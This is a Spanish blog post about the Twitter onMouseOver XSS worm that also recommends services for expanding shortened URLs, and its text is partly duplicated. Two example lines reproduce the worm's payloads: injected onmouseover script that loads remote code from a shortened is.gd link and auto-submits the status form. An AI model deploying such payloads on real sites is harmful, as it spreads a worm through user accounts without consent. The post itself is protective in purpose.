Hoy en día Twitter está siendo uno de los principales objetivos para explotar nuevas vulnerabilidades y probar diversos tipos de ataques. Sirva de ejemplo el último y reciente XSS que, aunque ya ha sido corregido, ha podido afectar en tan sólo unas horas a muchos usuarios simplemente pasando el cursor del ratón por encima del tuit malicioso (onMouseOver):
Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.
Hablamos por tanto de la importancia del "agrandamiento" de URLs que han sido previamente acortadas. No seáis mal pensad@s...X-), se trata de previsualizar el nombre completo del enlace para que, en la medida de lo posible, podamos identificar un sitio sospechoso o aparentemente no demasiado confiable.
Para ello y al igual que existen servicios online gratuitos para la reducción de URLs también existen servicios para expandirlos y previsualizar a dónde vamos a ser redirigidos. Y no sólo eso, además estos servicios incluyen algunas utilidades o herramientas como extensiones de Firefox, scripts de Greasemonkey e incluso APIs para desarrolladores web. Todas ellas nos facilitarán de forma transparente la previsualización de URLs.
En definitiva, nunca está de más tomar medidas de seguridad así que a continuación os dejo unos cuantos enlaces por si quereis utilizar estos servicios:
- Long URL Please
- LongURL
- ExpandMyURL
- RealURL
- Sucuri
- Untr.im
- Voizle
- Unshortn
código ejemplo 1:
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();
código ejemplo 2:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()
Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.
Hablamos por tanto de la importancia del "agrandamiento" de URLs que han sido previamente acortadas. No seáis mal pensad@s...X-), se trata de previsualizar el nombre completo del enlace para que, en la medida de lo posible, podamos identificar un sitio sospechoso o aparentemente no demasiado confiable.Para ello y al igual que existen servicios online gratuitos para la reducción de URLs también existen servicios para expandirlos y previsualizar a dónde vamos a ser redirigidos. Y no sólo eso, además estos servicios incluyen algunas utilidades o herramientas como extensiones de Firefox, scripts de Greasemonkey e incluso APIs para desarrolladores web. Todas ellas nos facilitarán de forma transparente la previsualización de URLs.
En definitiva, nunca está de más tomar medidas de seguridad así que a continuación os dejo unos cuantos enlaces por si quereis utilizar estos servicios:
- Long URL Please
- LongURL
- ExpandMyURL
- RealURL
- Sucuri
- Untr.im
- Voizle
- Unshortn
Comentarios
Publicar un comentario